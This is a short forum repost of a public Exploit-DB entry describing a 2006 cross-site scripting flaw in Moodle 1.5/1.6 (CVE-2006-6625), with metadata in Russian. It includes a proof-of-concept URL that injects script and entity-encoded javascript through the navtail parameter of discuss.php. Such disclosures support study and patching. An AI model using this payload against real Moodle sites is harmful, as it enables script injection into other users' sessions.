Exploit Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29284
Проверка EDB
  1. Пройдено
Автор
JOSE MIGUEL YANEZ VENEGAS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-6625
Дата публикации
2006-12-14
Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting
Код:
source: https://www.securityfocus.com/bid/21596/info

Moodle is reported prone to multiple input-validation vulnerabilities, including a cross-site scripting issue and an HTML injection issue, because the application fails to properly sanitize user-supplied input data. 

The cross-site scripting vulnerability is reported to affect version 1.6.1; the HTML-injection vulnerability affects version 1.5.

http://www.exmple.com/moodle/mod/forum/discuss.php?d=1&parent=2&navtail=<script >alert() < img src=& #106& #97& #118& #97& #115& #99& #114& #105& #112& #116& #58& #97& #108& #101& #114& #116& #40& #41>
 
Источник
www.exploit-db.com

Похожие темы